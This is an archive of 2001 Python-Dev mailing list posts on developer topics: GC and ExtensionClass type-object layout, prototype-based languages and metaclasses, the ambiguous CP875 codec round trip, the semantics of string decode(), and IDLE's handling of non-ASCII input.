Do any of the PyGtk objects define the GC type flag? The GC is fairly good at exposing memory management bugs that otherwise go unnoticed. If you're using glibc you can try setting the MALLOC_CHECK_ environment variable to 2. If you've got lots of memory you could also try using Electric Fence and running your program. Finally, you might try compiling with Py_DEBUG set. > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. I'd be willing to take a look (the chances of me reproducing it don't look good). A public RSA key is attached. Neil 1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas From sdm7g at Virginia.EDU Sat May 12 17:07:06 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 11:07:06 -0400 (EDT) Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Yeah ... What Tim said... Also: There are two basic implementation models: Delegation [a.k.a. "Lifetime sharing", cloning] sort of like python -- if you don't know how to handle it "ask" a parent object. ( "ask" in quotes, because I've recently been in a long argument about whether objective-C & smalltalk can really be said to "send messages" , or if it's "just" dynamic lookup and function application! ) Extension [a.k.a.
"Birth sharing", copying, concatenation ] more like how I imaging C++ vtables are built -- the python equivalent would be like merging all of the class __dict__'s together with name-clase priority going to the nearest relative. ( "Life Sharing" vs. "Birth Sharing" -- is a change in the base class after object creation inherited by the object? ) I think most Multiple-Inheritance languages use delegation, but no reason it won't work in extension. The diff is that in extension, everything has to get resolved at object creation. Extension could be made more flexible if on creation, you could not only add new methods, but rearrange and control the extension process ( sort of like "from xxx import yyy; from aaa import bbb" ). I would think one could use delegation by default, but provide an extension mechanism as an optimization, but I don't know if there's any system that does this. If it follows the paradigm, a prototype system doesn't have an 'isa' or '__class__' slot -- only a (linked) list of parent objects. But if you were simulating class orientation, one would add an 'isa' slot for the immediate prototype, and probably enforce some restrictions on the prototype objects that were playing the role of class objects. "If it follow the paradigm" -- as in OO in general, there are several flavors and implementations and some are may be hybrid systems. Self is the language most widely known as a prototype based language: some others: Newtonscript (from apple's late lamented Newton palmtop), Kevo (a forth based o-o language), Cardelli's Obliqu (This didn't stick in my mind from when I read the papers back in the "safe python" development days, but it's listed in my book.) as well as XlispStat's object system. (which isn't listed in that book but there is an ObjectLisp -- I don't know if they were at all related. ) -- and Tim said JavaScript. The Amulet and Garnet GUI systems are prototype based -- Garnet written in Lisp and Amulet in C++. 
For NewtonScript, Kevo, and maybe JavaScript, I suspect the simplicity of the system was a motivation. ("the book" I'm reading is "Prototype-Based Programming -- Concepts, Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan Moore, pub. Springer. A collection of papers, some of which are available on the Web -- I know the Self papers, one description of NewtonScript, and one or two articles on Kevo are online, as well as Cardelli's Obliq paper. ) -- "Steve" Majewski From martin at loewis.home.cs.tu-berlin.de Sat May 12 21:16:58 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 21:16:58 +0200 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> > Has anyone investigated interactions between ExtensionClass objects > and GC? At some point, extension classes used a literal copy of PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, and only had the spare fields that were expected then. Today, PyTypeObject has much more fields, so extension objects produce random errors (eg. with GC) when used in a modern interpreter (where the copy has not been synchronized). Whatever immediately follows the type object in memory may be interpreted as GC flag. Regards, Martin From guido at digicool.com Sat May 12 23:08:05 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:08:05 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200." <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> > At some point, extension classes used a literal copy of > PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, > and only had the spare fields that were expected then. 
Today, > PyTypeObject has much more fields, so extension objects produce random > errors (eg. with GC) when used in a modern interpreter (where the copy > has not been synchronized). Whatever immediately follows the type > object in memory may be interpreted as GC flag. Not quite true. ExtensionClasses (at least recent versions that worked with 1.5.2) contain a copy of the type object up to and including the tp_flags field, and the 2.1 code is careful not to use any newer fields without first checking the corresponding flag bit. Now, if you are using the 1.4 version of ExtensionClasses you might not have the tp_flags field either (I don't know, I can't easily check) but the 1.5.2-compatible version of ExtensionClasses doesn't even require recompilation to work with Python 2.1. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Sat May 12 22:12:39 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 22:12:39 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> > But I don't know whether the ambiguity in cp875 is a bug or an > undocumented feature The official (as in "as official as it gets") mapping between CP 875 and Unicode is at http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT This is also the file which served as an input to generate cp875.py. Character 1A, which is the mapping result of these characters, is indeed known with the name "SUBSTITUTE", apparently following the definition in http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm # substitute character (SUB): A control character that is used in the # place of a character that is recognized to be invalid or in error or # that cannot be represented on a given device. That would suggest that these characters in EBCDIC 875 do not have equivalents in Unicode. 
However, http://www.kostis.net/charsets/ebc875.htm suggests that the characters in question (3F, DC, E1, EC, ED, FC, and FD) have no character meaning at all. It seems that IBM's ICU library also maps U+001A to character 3F, see http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup It appears, from looking at http://www.natural-innovations.com/boo/asciiebcdic.html that byte 3F *is* the substitution character in EBCDIC. So it is a bug in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC character which is mapped to SUBSTITUTE; I think cp875 should be corrected to always map U+001A to 3F. That is not something the generator can currently do, though. So I think we can take one of two approaches: 1. admit that CP 875 is not round-trippable, and exclude it from the test (although when looking at the first 128 characters only, it is round-trippable). 2. remove the SUBSTITUTE mappings from CP875, acknowledging that apparently these characters have no meaning in that code page. Unfortunately, I could not find any official IBM documentation page that lists the characters supported in each of the EBCDIC code pages. The second seems to be more correct to me, although it is a deviation from the Unicode consortium publications. Regards, Martin From guido at digicool.com Sat May 12 23:21:21 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:21:21 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400." References: Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> > Also: There are two basic implementation models: > > Delegation [a.k.a. "Lifetime sharing", cloning] > sort of like python -- if you don't know how to handle it "ask" > a parent object.
( "ask" in quotes, because I've recently been > in a long argument about whether objective-C & smalltalk can > really be said to "send messages" , or if it's "just" dynamic > lookup and function application! ) > > Extension [a.k.a. "Birth sharing", copying, concatenation ] > more like how I imaging C++ vtables are built -- the python > equivalent would be like merging all of the class __dict__'s > together with name-clase priority going to the nearest > relative. > > ( "Life Sharing" vs. "Birth Sharing" -- is a change in the > base class after object creation inherited by the object? ) Interesting. So is the rest of this thread, but since Python is not a prototype language and is unlikely to become one, I'd like to mention that Python 2.2 will likely allow you to choose either paradigm, on a per-class basis, using metaclasses. I'm finding metaclasses in Python useful for different things than they are in Smalltalk, and I expect that they will continue to play a less important role. But they are important because they control many "policy" aspects of Python classes/types: e.g. whether instances have a __dict__ or a specific set of slots (maybe even typed slots), whether changes can be made to a class after it's been created, the semantics of multiple inheritance, and so on. Right now, my metaclasses continue to be implemented in C, although I expect that eventually they will be subclassable in Python. Watch the descr-branch in the CS tree. I hope I'll soon have some time to write a PEP, too. It's an interesting journey! The book I am reading about this: "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. http://cseng.awl.com/book/0,3828,0201433052,00.html --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g at Virginia.EDU Sat May 12 22:53:26 2001 From: sdm7g at Virginia.EDU (Steven D. 
Majewski) Date: Sat, 12 May 2001 16:53:26 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> Message-ID: On Sat, 12 May 2001, Guido van Rossum wrote: > Interesting. So is the rest of this thread, but since Python is not a > prototype language and is unlikely to become one, I'd like to mention > that Python 2.2 will likely allow you to choose either paradigm, on a > per-class basis, using metaclasses. As I said earlier: the only advantage would be if it could simplify things "under the hood" (compared to metaclasses) but could still provide the same Class semantics (with maybe a "proto" declaration sneaking its nose in under the tent.) But I have no immediate idea on how to do that, and it sounds like you're pretty far along into an implementation already. > I'm finding metaclasses in Python useful for different things than > they are in Smalltalk, and I expect that they will continue to play a > less important role. But they are important because they control many > "policy" aspects of Python classes/types: e.g. whether instances have > a __dict__ or a specific set of slots (maybe even typed slots), > whether changes can be made to a class after it's been created, the > semantics of multiple inheritance, and so on. I guess my practical question, which I meant to ask before I got myself sidetracked into preaching prototypes is: How much of the existing plumbing (specifically the Don Beaudry hack) can I rely on in the future for the objective-C/python bridge? With BOOST and Zope's extension classes relying on it, can I assume that it's being extended rather than replaced? ( I guess I ought to take a look at the code! ) > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html Thanks for the reference.
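Guido says metaclasses decide "policy" questions. Two of his examples are whether a class may be changed after it has been created and whether instances get a `__dict__` or a fixed set of slots. Both can be shown with today's Python 3 metaclass syntax. In the small sketch below, `FrozenClassMeta` and `Point` are illustrative names, not anything from the 2.2 descr-branch.

```python
class FrozenClassMeta(type):
    """Policy: once a class has been created with this metaclass, its
    attributes can no longer be rebound or deleted."""

    def __setattr__(cls, name, value):
        raise TypeError(f"class {cls.__name__} is frozen; cannot set {name!r}")

    def __delattr__(cls, name):
        raise TypeError(f"class {cls.__name__} is frozen; cannot delete {name!r}")


class Point(metaclass=FrozenClassMeta):
    # Policy for instances: a fixed set of slots and no per-instance __dict__.
    __slots__ = ("x", "y")

    def __init__(self, x, y):
        self.x = x
        self.y = y


p = Point(1, 2)
p.x = 10                    # allowed: instance slots are still writable
try:
    Point.z = 0             # rejected by the metaclass
except TypeError as exc:
    print(exc)              # class Point is frozen; cannot set 'z'
```

The class body itself is not affected, because the namespace is handed to `type.__new__` as a dict rather than assigned attribute by attribute. Only rebinding after creation is blocked.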
Talking about interesting journeys: Guido: did you ever imagine back at that first workshop at NIST that you and Python would be where you are today? -- Steve Majewski From gmcm at hypernet.com Sat May 12 23:09:41 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Sat, 12 May 2001 17:09:41 -0400 Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> References: Your message of "Sat, 12 May 2001 11:07:06 -0400." Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost> [Guido] > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html The two things that struck me most when I read that last year: - How eminently ill-suited C++ is for this stuff (the book develops a framework in C++) - a very convincing argument that if you derive C from A and B (whose metaclasses are not the same), the system must derive a metaclass for C, using MI from A and B's metaclasses. duct-tape-skull-cap-advised-ly y'rs - Gordon From tim.one at home.com Sat May 12 23:22:49 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 12 May 2001 17:22:49 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: [/F] > reverse sorting makes sense to me. but the cp-files appear to be > machine generated, so patching that python file won't help. Agreed. > a truly future-proof solution would be to specify exactly how to > resolve every many-to-one mapping, for every font having that > problem. but sorting them is clearly better than relying on > implementation-dependent behaviour...
The attached program suggests the problem is rare; of those encoding files that have a Python decoding_map dict, only these triggered a meaningful ambiguity complaint:

*** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
*** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875 is the only one that *can* fail (the ambiguities in cp1006 are for points > 0x7f, so aren't tested here). Hmm! Now I see that in a part of test_unicode that wasn't reached, cp875 and cp1006 are excluded, with this comment:

### These fail the round-trip:
#'cp1006', 'cp875', 'iso8859_8',

So the practical hack for now is to exclude cp875 from the earlier range(128) roundtrip test too. > (is Jython using exactly the same hashing and dictionary algorithms as > CPython? or does it work by accident also under Jython?) Sorry, no idea. Attempting to browse the Jython source on SourceForge caused this cute behavior:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

Python Exception Occurred

Traceback (innermost last):
  File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
    main()
  File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
    view_directory(request)
  File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
    fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
  File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
    raise 'error during rlog: '+hex(status)
error during rlog: 0x100

let's-rewrite-it-in-php-ly y'rs - tim

ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)

encfiles = [name for name in os.listdir(ENCODING_DIR)
            if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    ambiguous = [(v, ks) for v, ks in vtok.items() if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."

From tim.one at home.com Sat May 12 23:48:38 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 12 May 2001 17:48:38 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, whose encyclopedic knowledge of encoding details still isn't enough to get a clear answer (it's like somebody asking me for a simple answer to a floating point question ] > ... > So I think we can take one of two approaches: > > 1. admit that CP 875 is not round-trippable, and exclude it from the > test (although when looking at the first 128 characters only, it > is round-trippable). As I noted later, 875 is already excluded from the roundtrip test across range(128, 256). What it's failing is the roundtrip test across range(128): after unicode("?", "cp875") produces u'\x1a', the following .encode('cp875') has no way to know which range the original input came from. So it's not really round-trippable across range(128) either unless more info is given to .encode(). > 2. remove the SUBSTITUTE mappings from CP875, acknowledging that > apparently these characters have no meaning in that code page. > Unfortunately, I could not find any official IBM documentation > page that lists the characters supported in each of the EBCDIC > code pages. > > The second seems to be more correct to me, although it is a deviation > from the Unicode consortium publications.
Until you and MAL agree on the best thing to do (I have no opinion: my only exposure to Unicode in daily programming life remains the Python test suite), I'm going to opt for #1: as cp875.py stands today, it's simply a fact that it's not round-trippable across any range including 0x3f. From martin at loewis.home.cs.tu-berlin.de Sun May 13 00:32:10 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 00:32:10 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> > Now, if you are using the 1.4 version of ExtensionClasses you might > not have the tp_flags field either (I don't know, I can't easily > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > even require recompilation to work with Python 2.1. I'll attach a copy below of the struct as defined in pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension classes). As you can see, it does not provide tp_flags, but has a field of tp_xxx4 for it. That *should* work, except that it also has its 'methods' field where tp_traverse would go, and its class_flags field where tp_clear would go. Now, you write > ExtensionClasses (at least recent versions that worked with 1.5.2) > contain a copy of the type object up to and including the tp_flags > field, and the 2.1 code is careful not to use any newer fields > without first checking the corresponding flag bit. In this generality, it is apparently not true: Modules/gcmodule.c has, in delete_garbage, if ((clear = op->ob_type->tp_clear) != NULL) { ... 
    traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
    (void) traverse(PyObject_FROM_GC(gc), (visitproc)visit_decref, NULL);

which does not check any flags. That still shouldn't cause any problems, since the Gtk objects should never end up in the GC lists - but maybe I'm missing something. Regards, Martin

typedef struct {
    PyObject_VAR_HEAD
    char *tp_name; /* For printing */
    int tp_basicsize, tp_itemsize; /* For allocation */

    /* Methods to implement standard operations */
    destructor tp_dealloc;
    printfunc tp_print;
    getattrfunc tp_getattr;
    setattrfunc tp_setattr;
    cmpfunc tp_compare;
    reprfunc tp_repr;

    /* Method suites for standard classes */
    PyNumberMethods *tp_as_number;
    PySequenceMethods *tp_as_sequence;
    PyMappingMethods *tp_as_mapping;

    /* More standard operations (at end for binary compatibility) */
    hashfunc tp_hash;
    ternaryfunc tp_call;
    reprfunc tp_str;
    getattrofunc tp_getattro;
    setattrofunc tp_setattro;

    /* Space for future expansion */
    long tp_xxx3;
    long tp_xxx4;

    char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
    /* these must be last */
    int tp_alloc;
    int tp_free;
    int tp_maxalloc;
    struct _typeobject *tp_next;
#endif

    PyMethodChain methods;
    long class_flags;
    PyObject *class_dictionary;
    PyObject *bases;
    PyObject *reserved;
} PyExtensionClass;

From martin at loewis.home.cs.tu-berlin.de Sun May 13 14:08:02 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 14:08:02 +0200 Subject: [Python-Dev] ReleaseNode interface in 4XSLT Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Currently, 4XSLT has a dependency on the DOM implementation in terms of memory management (among other dependencies). I'd like to reduce this dependency, by providing a centralized function that knows how to release nodes.
In PyXML, I currently use

# Define ReleaseNode in a DOM-independent way
import xml.dom.ext
import xml.dom.minidom

def _releasenode(n):
    if isinstance(n, xml.dom.minidom.Node):
        n.unlink()
    else:
        xml.dom.ext.ReleaseNode(n)

try:
    from Ft.Lib import pDomlette
    def ReleaseNode(n):
        if isinstance(n, pDomlette.Node):
            pDomlette.ReleaseNode(n)
        else:
            _releasenode(n)
    _XsltElementBase = pDomlette.Element
except ImportError:
    ReleaseNode = _releasenode
    from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and supports installations without 4Suite (i.e. without pDomlette). I've put this into xslt/__init__.py, so that all callers of Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. If desired, I could produce a patch against the public Ft CVS. As a slightly independent question, such a function also ought to support DOM implementations not known to it; I'm thinking in particular of the Zope DOMs. I'd like to hear proposals on how such an interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite; you'd need to navigate from the node to the implementation, then you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown DOMs, effectively believing in reference counting, garbage collection, acquisition, and other black art.

Any comments appreciated, in particular

1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for Python DOM.

Regards, Martin From mwh at python.net Sun May 13 14:36:26 2001 From: mwh at python.net (Michael Hudson) Date: 13 May 2001 13:36:26 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A.
Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Fredrik Lundh wrote: > > can you take that again? shouldn't michael's example be > > equivalent to: > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > if not, I'd argue that your "decode" design is broken, instead > > of just buggy... > > Well, it is sort of broken, I agree. The reason is that > PyString_Encode() and PyString_Decode() guarantee the returned > object to be a string object. To be able to reuse Unicode codecs > I added code which converts Unicode back to a string in case the > codec return an Unicode object (which the .decode() method does). > This is what's failing. It strikes me that if someone executes aString.decode("latin-1") they're going to expect a unicode string. AIUI, what's currently happening is that the string is converted from a latin-1 8-bit string to the 16-bit unicode string I expected and then there is an attempt to convert it back to an 8-bit string using the default encoding. So if I'd done a sys.setdefaultencoding("latin-1") in my sitecustomize.py, then aString.decode("latin-1") would just be aString again? This doesn't seem optimal. > Perhaps I should simply remove the restriction and have both APIs > return the codec's return object as-is ?! (I would be in favour of > this, but I'm not sure whether this is already in use by someone...) Are all the codecs distributed with Python 2.1 unicode-related? If that's the case, PyString_Decode isn't terribly useful, is it? It seems unlikely that it received much use. Could be wrong of course. OTOH, maybe I'm trying to wedge too much behaviour onto a particular operation.
Do we want open(file).read().decode("jpeg") -> some kind of PIL object to be possible? Cheers, M. -- GET *BONK* BACK *BONK* IN *BONK* THERE *BONK* -- Naich using the troll hammer in cam.misc From mal at lemburg.com Sun May 13 18:53:55 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 18:53:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: <3AFEBC22.1F0AF685@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Fredrik Lundh wrote: > > > can you take that again? shouldn't michael's example be > > > equivalent to: > > > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > > > if not, I'd argue that your "decode" design is broken, instead > > > of just buggy... > > > > Well, it is sort of broken, I agree. The reason is that > > PyString_Encode() and PyString_Decode() guarantee the returned > > object to be a string object. To be able to reuse Unicode codecs > > I added code which converts Unicode back to a string in case the > > codec return an Unicode object (which the .decode() method does). > > This is what's failing. > > It strikes me that if someone executes > > aString.decode("latin-1") > > they're going to expect a unicode string. AIUI, what's currently > happening is that the string is converted from a latin-1 8-bit string > to the 16-bit unicode string I expected and then there is an attempt > to convert it back to an 8-bit string using the default encoding. So > if I'd done a > > sys.setdefaultencoding("latin-1") > > in my sitecustomize.py, then aString.decode("latin-1") would just be > aString again? This doesn't seem optimal. 
True and that's why I am proposing to loosen the restriction on having the two APIs returning strings only. > > Perhaps I should simply remove the restriction and have both APIs > > return the codec's return object as-is ?! (I would be in favour of > > this, but I'm not sure whether this is already in use by someone...) > > Are all the codecs distributed with Python 2.1 unicode-related? If > that's the case, PyString_Decode isn't terribly useful, is it? It > seems unlikely that it received much use. Could be wrong of course. All standard codecs in 2.0 and 2.1 are Unicode related. I am planning to write up a bunch of string-to-string codecs next week though which will then be the first non-Unicode related codecs in 2.2. > OTOH, maybe I'm trying to wedge too much behaviour onto a particular > operation. Do we want > > open(file).read().decode("jpeg") -> some kind of PIL object > > to be possible? This would be possible indeed. Even though some may find this coding style obscure, I think this technique has the same usefulness as e.g. piping at OS level. I am thinking of these use cases:

"???".decode("latin-1") -> Unicode (object construction)
"...jpeg data...".decode("jpeg") -> JpegImage object (ditto)
"???".decode("latin-1").encode("cp1521") -> string (recoding data)
"...long data...".encode("gzip") -> string (transfer encoding)
"...gzipped data...".decode("gzip") -> string (transfer decoding)

-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 13 19:20:01 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:20:01 +0200 Subject: [Python-Dev] Re: Ill-defined encoding for CP875?
References: Message-ID: <3AFEC241.62084286@lemburg.com> Tim Peters wrote: > > I have a way to make dict lookup a teensy bit cheaper(*) that significantly > reduces the number of collisions (which is much more valuable). > > This caused a number of std tests to fail, because they were implicitly > relying on the order in which a dict's entries are materialized via .keys() > or .items(). > > Most of these were easy enough to fix. The last failure remaining is > test_unicode, and I don't know how to fix it. It's dying here:
>
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
>
> when encoding == "cp875". There's a bogus problem you have to worm around > first: test_unicode neglected to import TestFailed, so it actually dies > with NameError while trying the "except TestFailed" clause after verify() > raises TestFailed. Once that's repaired, it's complaining about failing the > round-trip encoding. Ooops; this must have been caused by the assert statement removal in the test suite I hacked up some months ago. Funny that it never showed up... the code seems to be very robust ;-) > The original character in s it's griping about is "?" (0x3f). cp875.py has > this entry in its decoding_map dict:
>
>     0x003f: 0x001a, # SUBSTITUTE
>
> But 0x1a is not a *unique* value in this dict. There's also
>
>     0x00dc: 0x001a, # SUBSTITUTE
>     0x00e1: 0x001a, # SUBSTITUTE
>     0x00ec: 0x001a, # SUBSTITUTE
>     0x00ed: 0x001a, # SUBSTITUTE
>     0x00fc: 0x001a, # SUBSTITUTE
>     0x00fd: 0x001a, # SUBSTITUTE
>
> Therefore what appears associated with 0x1a in the derived encoding_map > dict:
>
>     encoding_map = {}
>     for k,v in decoding_map.items():
>         encoding_map[v] = k
>
> may end up being any of the 7 decoding_map keys that map to 0x1a. It just > so happened to map back to 0x3f before, but to 0xfd after the dict change, > so "?"
doesn't survive the round trip anymore. The "right" thing to do here is to simply remove cp875 from the test for round-tripping. It is not the only encoding which fails this test, but it's not our fault: the codecs were all generated from the original codec maps at the Unicode.org site. If their mappings are broken, we can't do much about it... other than to ignore the error or remove the codec altogether. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 13 19:40:58 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:40:58 +0200 Subject: [Python-Dev] IDLE and non-ASCII characters References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <3AFEC72A.33076220@lemburg.com> Martin von Loewis wrote: > > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='äö' > UnicodeError: ASCII encoding error: ordinal not in range(128) > > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. > > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. > > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. I have a bug report assigned to myself which indicates similar problems with _tkinter and Tk/Tcl. There were other problem reports on the German Python mailing list going in the same direction too.
The basic problem seems to be that Tk/Tcl applies too much magic to the text widget contents in order to find out the used encoding and this can easily cause the whole encoding mechanism to fail. A Tk/Tcl expert should really look into this and fix _tkinter.c to aid Tk/Tcl in not mixing up the encodings (e.g. it would probably be a good idea to recode Python 8bit-strings into whatever encoding Tk/Tcl assumes as default). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From Mike.Olson at fourthought.com Sun May 13 20:15:46 2001 From: Mike.Olson at fourthought.com (Mike Olson) Date: Sun, 13 May 2001 12:15:46 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Message-ID: <3AFECF52.FF7E9B26@FourThought.com> "Martin v. Loewis" wrote: > > > In PyXML, I currently use > > # Define ReleaseNode in a DOM-independent way > import xml.dom.ext > import xml.dom.minidom > def _releasenode(n): > if isinstance(n, xml.dom.minidom.Node): > n.unlink() > else: > xml.dom.ext.ReleaseNode(n) > > try: > from Ft.Lib import pDomlette > def ReleaseNode(n): > if isinstance(n, pDomlette.Node): > pDomlette.ReleaseNode(n) > else: > _releasenode(n) > _XsltElementBase = pDomlette.Element > except ImportError: > ReleaseNode = _releasenode > from minisupport import _XsltElementBase > > This code knows how to release minidom, 4DOM, and pDomlette nodes, and > supports installations without 4Suite (i.e. without pDomlette). I've > put this into xslt/__init__.py, so that all callers of > Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. > If desired, I could produce a patch against the public Ft CVS. What if we put these on the implementation, that or came up with a standard interface on the node. 
